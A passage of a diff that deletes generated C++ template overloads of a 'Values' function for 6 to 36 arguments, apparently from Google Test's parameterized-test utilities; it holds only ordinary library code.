-  return internal::ValueArray6<T1, T2, T3, T4, T5, T6>(v1, v2, v3, v4, v5, v6);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-internal::ValueArray7<T1, T2, T3, T4, T5, T6, T7> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7) {
-  return internal::ValueArray7<T1, T2, T3, T4, T5, T6, T7>(v1, v2, v3, v4, v5,
-      v6, v7);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-internal::ValueArray8<T1, T2, T3, T4, T5, T6, T7, T8> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8) {
-  return internal::ValueArray8<T1, T2, T3, T4, T5, T6, T7, T8>(v1, v2, v3, v4,
-      v5, v6, v7, v8);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-internal::ValueArray9<T1, T2, T3, T4, T5, T6, T7, T8, T9> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9) {
-  return internal::ValueArray9<T1, T2, T3, T4, T5, T6, T7, T8, T9>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-internal::ValueArray10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10) {
-  return internal::ValueArray10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-internal::ValueArray11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10,
-    T11> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11) {
-  return internal::ValueArray11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10,
-      T11>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-internal::ValueArray12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-    T12> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12) {
-  return internal::ValueArray12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-internal::ValueArray13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-    T13> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13) {
-  return internal::ValueArray13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-internal::ValueArray14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14) {
-  return internal::ValueArray14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-internal::ValueArray15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15) {
-  return internal::ValueArray15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-internal::ValueArray16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16) {
-  return internal::ValueArray16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-internal::ValueArray17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17) {
-  return internal::ValueArray17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-internal::ValueArray18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18) {
-  return internal::ValueArray18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-internal::ValueArray19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19) {
-  return internal::ValueArray19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-internal::ValueArray20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20) {
-  return internal::ValueArray20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-internal::ValueArray21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21) {
-  return internal::ValueArray21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-internal::ValueArray22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22) {
-  return internal::ValueArray22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-internal::ValueArray23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23) {
-  return internal::ValueArray23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
-      v20, v21, v22, v23);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-internal::ValueArray24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12,
-    T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20,
-    T21 v21, T22 v22, T23 v23, T24 v24) {
-  return internal::ValueArray24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24>(v1, v2,
-      v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18,
-      v19, v20, v21, v22, v23, v24);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-internal::ValueArray25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11,
-    T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19,
-    T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25) {
-  return internal::ValueArray25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17,
-      v18, v19, v20, v21, v22, v23, v24, v25);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-internal::ValueArray26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-    T26> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26) {
-  return internal::ValueArray26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15,
-      v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-internal::ValueArray27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-    T27> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27) {
-  return internal::ValueArray27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14,
-      v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-internal::ValueArray28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-    T28> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28) {
-  return internal::ValueArray28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13,
-      v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26, v27,
-      v28);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-internal::ValueArray29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16, T17 v17,
-    T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24, T25 v25,
-    T26 v26, T27 v27, T28 v28, T29 v29) {
-  return internal::ValueArray29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12,
-      v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25, v26,
-      v27, v28, v29);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-internal::ValueArray30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8,
-    T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15, T16 v16,
-    T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23, T24 v24,
-    T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30) {
-  return internal::ValueArray30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11,
-      v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24, v25,
-      v26, v27, v28, v29, v30);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-internal::ValueArray31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31) {
-  return internal::ValueArray31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10,
-      v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24,
-      v25, v26, v27, v28, v29, v30, v31);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-internal::ValueArray32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7,
-    T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32) {
-  return internal::ValueArray32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32>(v1, v2, v3, v4, v5, v6, v7, v8, v9,
-      v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-internal::ValueArray33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6,
-    T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14, T15 v15,
-    T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22, T23 v23,
-    T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30, T31 v31,
-    T32 v32, T33 v33) {
-  return internal::ValueArray33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33>(v1, v2, v3, v4, v5, v6, v7, v8,
-      v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23,
-      v24, v25, v26, v27, v28, v29, v30, v31, v32, v33);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-internal::ValueArray34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5,
-    T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13, T14 v14,
-    T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21, T22 v22,
-    T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29, T30 v30,
-    T31 v31, T32 v32, T33 v33, T34 v34) {
-  return internal::ValueArray34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34>(v1, v2, v3, v4, v5, v6, v7,
-      v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22,
-      v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-internal::ValueArray35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35) {
-  return internal::ValueArray35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35>(v1, v2, v3, v4, v5, v6,
-      v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21,
-      v22, v23, v24, v25, v26, v27, v28, v29, v30, v31, v32, v33, v34, v35);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-internal::ValueArray36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-    T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    T29, T30, T31, T32, T33, T34, T35, T36> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10, T11 v11, T12 v12, T13 v13,
-    T14 v14, T15 v15, T16 v16, T17 v17, T18 v18, T19 v19, T20 v20, T21 v21,
-    T22 v22, T23 v23, T24 v24, T25 v25, T26 v26, T27 v27, T28 v28, T29 v29,
-    T30 v30, T31 v31, T32 v32, T33 v33, T34 v34, T35 v35, T36 v36) {
-  return internal::ValueArray36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26, T27, T28, T29, T30, T31, T32, T33, T34, T35, T36>(v1, v2, v3, v4,
-      v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19,
